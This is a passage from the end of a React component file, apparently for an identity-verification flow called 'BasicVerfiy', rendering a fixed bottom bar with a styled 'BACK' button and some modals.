                <div className='w-full mx-auto fixed bottom-0 left-[150px] Mlg:left-0 right-0 bg-white border-t border-[#E5E7EB]'>
                  <div className='flex justify-center w-full p-5 Mlg:px-[16px] bg-white mx-auto'>
                    <div className='w-full lg:w-[620px] flex justify-between'>
                      <button onClick={() => setCurrent(0)}
                        className="border border-[#454CFF] bg-white rounded-[18px] flex items-center justify-center py-[5px] px-[17px] text-[#454CFF]"
                      >
                        <Icon icon="ep:arrow-left-bold" className="w-[14px] h-[14px] mr-[6px] flex-shrink-0" />
                        <span className="text-[16px] leading-[24px] font-[600] block">{t('BACK')} </span>
                      </button>
                    </div>
                  </div>
                </div>}
            </div>
          </>
      }

      {lockedFlowModals}
    </div>
  )
}

export default BasicVerfiy
